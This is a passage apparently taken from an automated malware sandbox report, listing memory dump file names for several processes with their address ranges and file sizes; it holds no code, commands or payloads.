                                • memory/668-20-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-21-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-160-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-16-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-777-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-940-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-1518-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-22-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-35-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-34-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-33-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-32-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-96-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-23-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/668-24-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/1456-867-0x00000000074A0000-0x00000000074B4000-memory.dmp

                                  Filesize

                                  80KB

                                • memory/1456-845-0x0000000006390000-0x00000000063AE000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/1456-865-0x0000000007320000-0x0000000007331000-memory.dmp

                                  Filesize

                                  68KB

                                • memory/1456-869-0x00000000074D0000-0x00000000074D8000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/1456-846-0x0000000006FC0000-0x0000000007063000-memory.dmp

                                  Filesize

                                  652KB

                                • memory/1456-862-0x0000000007190000-0x000000000719A000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/1456-866-0x0000000007490000-0x000000000749E000-memory.dmp

                                  Filesize

                                  56KB

                                • memory/1456-835-0x0000000072D60000-0x0000000072DAC000-memory.dmp

                                  Filesize

                                  304KB

                                • memory/1456-833-0x0000000005ED0000-0x0000000005F1C000-memory.dmp

                                  Filesize

                                  304KB

                                • memory/1456-834-0x00000000063D0000-0x0000000006402000-memory.dmp

                                  Filesize

                                  200KB

                                • memory/1456-868-0x00000000074E0000-0x00000000074FA000-memory.dmp

                                  Filesize

                                  104KB

                                • memory/2904-27-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2904-31-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2904-29-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2904-28-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/3184-787-0x0000000000B80000-0x000000000180A000-memory.dmp

                                  Filesize

                                  12.5MB

                                • memory/3184-690-0x0000000000B80000-0x000000000180A000-memory.dmp

                                  Filesize

                                  12.5MB

                                • memory/3220-90-0x0000000000400000-0x0000000000459000-memory.dmp

                                  Filesize

                                  356KB

                                • memory/3220-92-0x0000000000400000-0x0000000000459000-memory.dmp

                                  Filesize

                                  356KB

                                • memory/3332-114-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/3332-125-0x00000000002D0000-0x000000000077A000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/3620-180-0x0000000000C30000-0x00000000010DE000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/3620-156-0x0000000000C30000-0x00000000010DE000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/4176-95-0x0000000000400000-0x0000000000833000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/4176-569-0x0000000000400000-0x0000000000833000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/4176-805-0x0000000000400000-0x0000000000833000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/4176-1822-0x0000000000400000-0x0000000000833000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/4176-51-0x0000000000400000-0x0000000000833000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/4176-178-0x0000000000400000-0x0000000000833000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/4176-1100-0x0000000000400000-0x0000000000833000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/4176-112-0x0000000000400000-0x0000000000833000-memory.dmp

                                  Filesize

                                  4.2MB

                                • memory/4260-176-0x00000000001F0000-0x000000000087E000-memory.dmp

                                  Filesize

                                  6.6MB

                                • memory/4260-177-0x00000000001F0000-0x000000000087E000-memory.dmp

                                  Filesize

                                  6.6MB

                                • memory/4300-1623-0x0000000000400000-0x00000000008BE000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/4300-1624-0x0000000000400000-0x00000000008BE000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/4300-1003-0x0000000000400000-0x00000000008BE000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/4300-1152-0x0000000010000000-0x000000001001C000-memory.dmp

                                  Filesize

                                  112KB

                                • memory/4432-822-0x0000000005E10000-0x0000000005E5C000-memory.dmp

                                  Filesize

                                  304KB

                                • memory/4432-806-0x0000000005690000-0x00000000059E4000-memory.dmp

                                  Filesize

                                  3.3MB

                                • memory/4784-18-0x0000000000250000-0x00000000006FA000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/4784-4-0x0000000000250000-0x00000000006FA000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/4784-1-0x0000000076FC4000-0x0000000076FC6000-memory.dmp

                                  Filesize

                                  8KB

                                • memory/4784-0-0x0000000000250000-0x00000000006FA000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/4784-2-0x0000000000251000-0x000000000027F000-memory.dmp

                                  Filesize

                                  184KB

                                • memory/4784-3-0x0000000000250000-0x00000000006FA000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/5876-408-0x0000000000EA0000-0x000000000115A000-memory.dmp

                                  Filesize

                                  2.7MB

                                • memory/5876-477-0x0000000000EA0000-0x000000000115A000-memory.dmp

                                  Filesize

                                  2.7MB

                                • memory/5876-476-0x0000000000EA0000-0x000000000115A000-memory.dmp

                                  Filesize

                                  2.7MB

                                • memory/5876-760-0x0000000000EA0000-0x000000000115A000-memory.dmp

                                  Filesize

                                  2.7MB

                                • memory/5876-780-0x0000000000EA0000-0x000000000115A000-memory.dmp

                                  Filesize

                                  2.7MB

                                • memory/5984-781-0x0000000007470000-0x0000000007AEA000-memory.dmp

                                  Filesize

                                  6.5MB

                                • memory/5984-762-0x0000000004D60000-0x0000000004D82000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/5984-775-0x0000000005D00000-0x0000000005D1E000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/5984-774-0x0000000005870000-0x0000000005BC4000-memory.dmp

                                  Filesize

                                  3.3MB

                                • memory/5984-776-0x0000000005D50000-0x0000000005D9C000-memory.dmp

                                  Filesize

                                  304KB

                                • memory/5984-764-0x0000000005700000-0x0000000005766000-memory.dmp

                                  Filesize

                                  408KB

                                • memory/5984-763-0x0000000005690000-0x00000000056F6000-memory.dmp

                                  Filesize

                                  408KB

                                • memory/5984-788-0x0000000007CC0000-0x0000000007E82000-memory.dmp

                                  Filesize

                                  1.8MB

                                • memory/5984-761-0x0000000004F60000-0x0000000005588000-memory.dmp

                                  Filesize

                                  6.2MB

                                • memory/5984-785-0x00000000080A0000-0x0000000008644000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/5984-758-0x0000000002750000-0x0000000002786000-memory.dmp

                                  Filesize

                                  216KB

                                • memory/5984-782-0x0000000006260000-0x000000000627A000-memory.dmp

                                  Filesize

                                  104KB

                                • memory/5984-783-0x0000000006FF0000-0x0000000007086000-memory.dmp

                                  Filesize

                                  600KB

                                • memory/5984-784-0x00000000062F0000-0x0000000006312000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/6084-864-0x0000000000AD0000-0x00000000016AD000-memory.dmp

                                  Filesize

                                  11.9MB

                                • memory/6084-941-0x0000000000AD0000-0x00000000016AD000-memory.dmp

                                  Filesize

                                  11.9MB